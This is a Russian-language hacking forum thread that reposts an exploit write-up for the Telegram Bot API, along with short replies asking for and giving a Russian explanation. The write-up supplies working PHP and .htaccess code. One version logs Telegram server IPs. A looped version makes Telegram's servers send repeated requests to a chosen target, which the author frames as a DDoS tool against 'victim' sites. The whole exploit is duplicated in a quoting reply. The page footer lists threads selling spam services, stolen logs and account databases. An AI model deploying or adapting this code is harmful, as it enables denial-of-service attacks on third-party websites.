Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Код:
###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4
 
D

dkfancska

Код:
###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4
А можно поподробнее что с этим делать
 

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.
 
H

HATRED

В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.
спасибо за ответ
 
Название темы
Автор Заголовок Раздел Ответы Дата
websprojekt Ожидает оплаты Telegram Bot | Инвайтер | Cпамер | Парсер Телеграм Все что не подошло по разделу 1
C Крипт за €15 | Fryp Files ~ €15 - Telegram BOT: @cryptmodebot | Auto Crypt Files 24/7 Ищу работу. Предлагаю свои услуги. 0
B Разработаю️ ▷Создам Телеграм/VK Бота ▷ ️ Creat Telegram/VKontakte Bot Ищу работу. Предлагаю свои услуги. 0
B Проверено [МАГАЗИН] Telegram Bot Logs Seller Финансы - биллинги, банки, кошельки, логи 0
N Telegram bot (ИНТЕРАКТИВНАЯ ТЕМА ДЛЯ ОБЩЕГО ЗАРАБОТКА). Способы заработка 2
S [PHP] Telegram Bot Другие ЯП 3
DOMINUS Проверено Блокировка (BAN) соц.сетей и мессенджеров [INSTAGRAM, WhatsApp, FaceBook (FB), Telegram, VK, OK и многих других] Ищу работу. Предлагаю свои услуги. 0
H [ FREE ] Бот отрисовщик в Telegram Другое 6
Emilio_Gaviriya Статья Как получают привязанный к Telegram мобильный номер. Анонимность и приватность 0
lonesttar Ожидает оплаты Админ панель + бот автопродаж telegram Продажа софта 0
Easy_AI Ожидает оплаты Нейрокомментинг | Автокомментинг| Софт для продвижения в Telegram Продажа софта 0
GetLeads [Telegram +] Рассылка/Инвайтинг в Телеграм. [+] Множество отзывов с форумов! Ищу работу. Предлагаю свои услуги. 4
GetLeads Закрыто Обучение: рассылкам\инвайту\регистрации и другому в Telegram. В среднем проф спамеры зарабатывают от 2000$+ Ищу работу. Предлагаю свои услуги. 4
fireaccs Продам FIRE-ACCS.BIZ - Магазин Аккаунтов Twitter, Telegram, Instagram, Facebook, TikTok, ВК, OK, Twitch, Discord и т.д. Аккаунты/Админки/Документы 1
N MIX 1M 900K PSN BASE TELEGRAM Emails_1 Раздача email 0
N MIX FACEBOOK ADS MAIL PASS ACCESS TELEGRAM >>>> Emails_1 Раздача email 0
N Zabugor 1.6M FACEBOOK GAMES SHOP NETFLIX BASE TELEGRAM Emails_1 Раздача email 0
N Zabugor 1ML 400K FACEBOOK ADS CODE 8 ДЛЯ ДОСТУПА К GOOD TELEGRAM Emails_1 Раздача email 1
Support81 Дуров и его криптопланы: Telegram внедряет TON Wallet Новости в сети 0
JustTG Ожидает оплаты Just-tg.com | Сервис по продвижению каналов и ботов в TELEGRAM | Прямой поставщик 24/7 Ищу работу. Предлагаю свои услуги. 1
semsvm Интересно Автоответчик на сообщения в Telegram Бруты/Парсеры/Чекеры 1
Support81 Мошенники генерируют изображения фальшивых банковских карт через чат-боты в Telegram Новости в сети 0
T База Telegram 700к Другое 9
Support81 Telegram как минное поле: новая угроза для пользователей Android Новости в сети 0
Support81 Интересно Спорное обновление в Telegram: сбор IP-адресов для рекламы Новости в сети 0
М Закрыто Продам аккаунты Телеграм Ru|Снг | Telegram Account Trust 500 day+ Корзина 1
jsbypass Стикеры для Telegram на заказ / Низкие цены, высокое качество Услуги дизайнеров/веб-разработчиков 1
I На проверке Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия Ищу работу. Предлагаю свои услуги. 1
M На проверке Заказать Комментарии - Отзывы в Telegram Канал или Чат Ищу работу. Предлагаю свои услуги. 2
Youtube Provider На проверке ✅✅✅YouTube-Provider.com - SMM Провайдер / YouTube, Telegram, Instagram, Twitter и другие соцсети✅✅✅ Ищу работу. Предлагаю свои услуги. 1
Mr Crabs Продам Telegram парсер участников чата по сообщениям Куплю/Продам 0
saul_ Чек номеров на наличие Telegram/ Filter (checking) numbers Telegram Ищу работу. Предлагаю свои услуги. 1
M Продам [2 руб.] Инвайт Telegram | Безопасный метод (даже в чаты с баном) Спам / Флуд / Ддос 3
G Продам Платежные системы, Карты, IBAN, Биржи, Крипта, Кошельки, Телефония, Симки, Прокси, Дропы, Сканы - Telegram бот Финансы - биллинги, банки, кошельки, логи 0
T ТГ-ПАРСЕР – спарси половину Telegram! Бруты/Парсеры/Чекеры 2
D DivineSMM.com| Telegram | Twitter | Instagram | Только живая ЦА | Рассылка в лс Бруты/Парсеры/Чекеры 0
A Alice in The Land of Malware | ALICESHOPBOT (Сайт/Бот авто-продаж Telegram) Корзина 0
A Alice in The Land of Malware | SHOP SCAM (Сайт/Бот авто-продаж Telegram) Корзина 0
T Закрыто Teleboost софт для работы с telegram Корзина 1
T Закрыто TELEGRAM SOFT Gods\Expert - Многоцелевой комбайн по работе с телеграмм Корзина 1
TeleGPromotion Закрыто Качественное продвижение в Telegram! Рассылка в личные сообщения. Инвайт. Корзина 1
DOMINUS В Telegram аннулируют подписки Premium, полученные обманным путем Новости в сети 0
F Продам TGMOTION - Сервис массовой рассылки сообщений по чатам и контактам в Telegram Трафик, загрузки, инсталлы, iframe 5
T ИНВАЙТ И РАССЫЛКА В TELEGRAM Корзина 0
T ПРОДВИЖЕНИЕ ЧАТОВ / КАНАЛОВ В TELEGRAM Корзина 0
Mr Crabs Закрыто Telegram Первонах - скрипт на PHP Корзина 1
Zarik3232 Продам Накрутка instagram telegram vkontate youtube twitch facebook tiktok и тд Все что не подошло по разделу 35
T Закрыто ПРОДВИЖЕНИЕ ЧАТОВ / КАНАЛОВ В TELEGRAM Корзина 1
P На проверке Рассылка, маркетинг Discord, Telegram, Twitter. Ищу работу. Предлагаю свои услуги. 1
T На проверке ИНВАЙТ И РАССЫЛКА В TELEGRAM Корзина 1

Название темы